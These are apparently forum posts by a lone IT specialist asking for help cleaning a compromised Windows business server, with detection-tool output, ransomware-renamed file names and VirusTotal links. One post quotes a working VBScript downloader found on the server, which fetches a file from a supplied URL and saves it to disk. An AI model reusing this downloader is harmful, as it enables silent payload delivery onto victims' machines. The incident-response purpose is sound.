AlinTech

Honorary Members
  • Posts: 28
  • Reputation: 0 Neutral


  1. I'm the only IT specialist. The server is compromised. I backup and export the DBs and I create a new VM. Thank you very much for support, sir! Thank you for your time! Best regards.
  2. PS C:\Users\PitSoft\Downloads\labs_campaigns-master\labs_campaigns-master\Vollgar> .\detect_vollgar.ps1

     Security warning
     Run only scripts that you trust. While scripts from the internet can be useful, this script can potentially harm your computer. If you trust this script, use the Unblock-File cmdlet to allow the script to run without this warning message. Do you want to run C:\Users\PitSoft\Downloads\labs_campaigns-master\labs_campaigns-master\Vollgar\detect_vollgar.ps1?
     [D] Do not run  [R] Run once  [S] Suspend  [?] Help (default is "D"): r

     Vollgar Campaign Detection Tool
     Written By Guardicore Labs
     Contact us at: labs@guardicore.com

     [V] Vollgar's malicious service SQLAGENT MSSQL SQLIOSIMSA was not found on this host.
     [V] Vollgar's local user IUER_SERVER was not found on this host.
     [V] No malicious payloads were found.
     [V] No malicious scheduled tasks were found.
     [V] No evidence for the Vollgar campaign has been found on this host.
     PS C:\Users\PitSoft\Downloads\labs_campaigns-master\labs_campaigns-master\Vollgar>
  3. If you want remote control, tell me and I give you. Thank you for support.
  4. https://www.virustotal.com/gui/file/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855/detection
     It's not true, check the community tab. And the file appears to have been scanned on 2020-04-11 21:29:47 UTC.
  5. Yes, this is the content.

         on error resume next
         with wscript:if .arguments.count<2 then .quit:end if
         set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp")
         web.open "get",.arguments(0),0:web.send:if web.status>200 then quit
         aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with

     ----------------------------
     I found in C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1048-7B44-AC0F074E4100} these files:
       abcpy.ini.id-58D92ED6.[datadecrypt@qq.com].ETH
       setup.ini.id-58D92ED6.[datadecrypt@qq.com].ETH
     I found in C:\ProgramData\DataFiles\Microsoft\Fonts these files: CSCDA59.tmp, CSCEFB6.tmp, m2017.bat, m2017.exe, up.cs
     The content of m2017.bat is:
     I found in C:\ProgramData\MySQL\MySQL Server 5.5\data\mysql, view in attach. I didn't find any VBS files. Thank you
  6. Question: Is this machine in a business-network or home-network type setting?
     A: Business-network
     Q: Is this same system serving multiple simultaneous users? Or just yourself?
     A: multiple simultaneous users
     ---------------------------------------------------------
     I don't use Internet Explorer but I know viruses use it to download infected files. Thank you very much for support.
     Attachments: mbar-log-2020-04-11 (22-05-01).txt, AdwCleaner[S01].txt, Search.txt
  7. This is my BGP log with AiProtection - Infected Device Prevention and Blocking.
     Attachments: IntrusionPreventionSystem.csv, MaliciousSitesBlocking.csv
  8. Internet Explorer history, I found something strange, view in attach.
  9. In ProgramData I found this: SQLAGENTVDC.exe, usdta.vbs (in attach, I opened it with edit).
     https://www.virustotal.com/gui/file/656c6324142ebbc7184792130f9299c6e2a0bfc451f2609ca5947d2bcc5cb288/detection
     Attachment: New Text Document.txt
  10. Yes, I have enabled Audit Process Creation and Include command line in process creation events, exactly as in the documentation.
  11. Microsoft Windows [Version 10.0.18363.752]
      (c) 2019 Microsoft Corporation. All rights reserved.

      C:\WINDOWS\system32>sfc /scannow

      Beginning system scan. This process will take some time.

      Beginning verification phase of system scan.
      Verification 100% complete.

      Windows Resource Protection did not find any integrity violations.

      C:\WINDOWS\system32>

      Now, I start the full scan with ESET online. Thx